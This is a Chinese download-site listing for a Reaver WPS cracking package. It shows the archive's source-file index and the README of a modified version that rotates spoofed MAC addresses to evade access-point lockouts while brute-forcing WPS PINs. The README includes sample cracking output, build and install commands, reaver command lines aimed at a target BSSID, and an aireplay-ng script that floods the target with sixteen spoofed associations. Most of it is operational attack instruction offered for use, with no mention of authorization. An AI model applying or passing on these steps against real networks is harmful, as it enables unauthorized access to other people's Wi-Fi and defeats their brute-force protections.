reaver-wps-master.zip_opos_reaver_visualc

共276个文件

c：126个

h：94个

8：21个

版权申诉

opos

reaver

visual_c

wps

168 浏览量 2022-09-23 17:53:24 上传评论收藏 914KB ZIP 举报

资源详情

资源评论

资源推荐

收起资源包目录

reaver-wps-master.zip_opos_reaver_visual c_wps （276个子文件）

iftab.5 9KB

iftab.5 6KB

iftab.5 5KB

wireless.7 3KB

wireless.7 2KB

iwconfig.8 18KB

iwconfig.8 16KB

ifrename.8 5KB

ifrename.8 4KB

iwlist.8 4KB

ifrename.8 4KB

iwpriv.8 4KB

iwevent.8 4KB

iwlist.8 4KB

iwgetid.8 4KB

iwpriv.8 3KB

iwspy.8 3KB

iwevent.8 3KB

iwlist.8 3KB

iwevent.8 3KB

iwpriv.8 3KB

iwspy.8 3KB

iwgetid.8 3KB

configure.ac 655B

keys.c 183KB

iwlib.c 87KB

libtommath.c 76KB

wps_registrar.c 76KB

tls_openssl.c 71KB

ifrename.c 69KB

iwlist.c 60KB

x509v3.c 49KB

iwconfig.c 46KB

aes-internal.c 40KB

tls_gnutls.c 36KB

pcsc_funcs.c 33KB

wps_enrollee.c 32KB

tlsv1_server_read.c 29KB

iwpriv.c 28KB

dh_groups.c 25KB

tlsv1_client_read.c 25KB

wpa_common.c 21KB

tlsv1_client_write.c 20KB

iwevent.c 20KB

tlsv1_server_write.c 20KB

80211.c 20KB

tls_schannel.c 19KB

tlsv1_client.c 18KB

crypto_cryptoapi.c 16KB

tlsv1_server.c 16KB

tls_nss.c 15KB

des-internal.c 15KB

builder.c 15KB

wps_common.c 15KB

tls_internal.c 15KB

ms_funcs.c 15KB

exchange.c 15KB

crypto_libtomcrypt.c 14KB

eloop.c 13KB

iwgetid.c 13KB

wps.c 13KB

eloop_win.c 12KB

wpsmon.c 12KB

tlsv1_cred.c 12KB

tlsv1_record.c 11KB

crypto_openssl.c 11KB

cracker.c 11KB

sql.c 10KB

wps_attr_parse.c 10KB

iwspy.c 10KB

milenage.c 10KB

globule.c 10KB

wpa_ctrl.c 10KB

wps_dev_attr.c 10KB

radiotap.c 9KB

argsparser.c 9KB

sha1-internal.c 9KB

md5-internal.c 9KB

crc.c 9KB

rsa.c 9KB

wpa_debug.c 8KB

wps_attr_build.c 8KB

wps_attr_process.c 8KB

md4-internal.c 8KB

session.c 8KB

eloop_none.c 8KB

common.c 8KB

libwps.c 8KB

tlsv1_common.c 7KB

os_internal.c 7KB

wpscrack.c 7KB

os_unix.c 7KB

ieee802_11_common.c 7KB

crypto_gnutls.c 7KB

wpabuf.c 7KB

trace.c 7KB

共 276 条

REAVER WPS WITH MAC CHANGER ============== REAVER WPS modified version with MAC Address last character changer to speed up the attack. Well, some times the AP will reject the "EAPOL Request" after a success pin try. I made some tests with simultaneous reaver instances running with different MACs (the -m argument), and when one instance gets "WARNING: Receive timeout occurred", the other gets "Received identity request" and continue the cracking. The problem of this method is: The reaver tool doesn't support simultaneous instances (ok, I read the FAQ about it). If you run two reaver instances, by example, the two instances will try the same pin at the same time. I made some changes on the reaver source code. Look the output after my changes: ``` [+] Using MAC BC:99:47:B7:03:E9 [+] Trying pin 00485678 [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M3 message [+] Sending M4 message [+] Received M3 message [+] Received M3 message [+] Received WSC NACK [+] Sending WSC NACK [+] Using MAC BC:99:47:B7:03:E8 [+] Trying pin 00495677 [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M3 message [+] Sending M4 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received WSC NACK [+] Sending WSC NACK [+] Using MAC BC:99:47:B7:03:E7 [+] Trying pin 00505673 ... ``` On the first try, reaver is using the client MAC "BC:99:47:B7:03:E9" (it is not a real MAC, I'm just using for the example), on the second, "BC:99:47:B7:03:E8", on the third, "BC:99:47:B7:03:E7". Well, after the use of the MAC "BC:99:47:B7:03:E0", reaver will start again on "BC:99:47:B7:03:E9". The numbers: With this method: (13 seconds/pin) Without this method: (31 seconds/pin) How to install ============== Extract the tarball ```bash tar -xzvf reaver-1.4-mac-changer.tar.gz ``` Install Required Libraries and Tools ```bash sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev ``` Build Reaver ```bash cd reaver-1.4-mac-changer cd src ./configure make ``` Install Reaver ```bash sudo make install ``` How to use ============== ```bash reaver -i mon0 -b AA:BB:CC:DD:EE:FF -M ``` or ```bash reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer ``` What I recommend: ```bash reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 --no-associate -vv ``` To associate more effectively, I recommend to use aireplay-ng tool. Create a "associate.sh" file, and put this inside: ```bash aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZF & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZE & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZD & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZC & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZB & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZA & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z9 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z8 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z7 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z6 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z5 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z4 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z3 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z2 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z1 & aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z0 & ``` PS: Change AA:BB:CC:DD:EE:FF to the BSSID and ZZ:ZZ:ZZ:ZZ:ZZ:Z to your MAC (without the last digit). Before using reaver tool, just type "sh associate.sh". To kill all the aireplay-ng, type "killall aireplay-ng". If you have success using this method, please, share with us to improve more and more the reaver WPS. Author ============== [@gabrielrcouto](http://www.twitter.com/gabrielrcouto) License ============== [MIT License](http://zenorocha.mit-license.org/)